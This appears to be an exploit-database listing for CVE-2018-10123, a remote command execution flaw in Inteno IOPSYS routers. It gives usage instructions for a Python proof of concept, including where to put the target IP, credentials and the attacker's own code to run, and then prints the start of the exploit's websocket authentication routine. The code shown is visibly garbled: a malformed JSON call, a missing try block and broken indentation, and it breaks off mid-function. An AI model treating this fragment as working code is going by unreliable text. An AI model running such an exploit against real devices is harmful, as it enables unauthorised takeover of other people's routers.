Inteno IOPSYS 2.0 CVE-2018-10123 – Remote Command Execution

Authors:neonsea                 Risk:High

CVE:CVE-2018-10123             0day:Remote Command Execution 

0day -id:0DAY-176192            Date:2018-05-17


p910nd on Inteno IOPSYS 2.0 through 4.2.0 allows remote attackers to read, or append data to, arbitrary files via requests on TCP port 9100. This vulnerability has been assigned the CVE ID: CVE-2018-10123.


This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.

import json
import sys
import socket
import os
import time
from websocket import create_connection
def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        {"username": username,"password":password}],
    response =  json.loads(ws.recv())
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:

Leave a Reply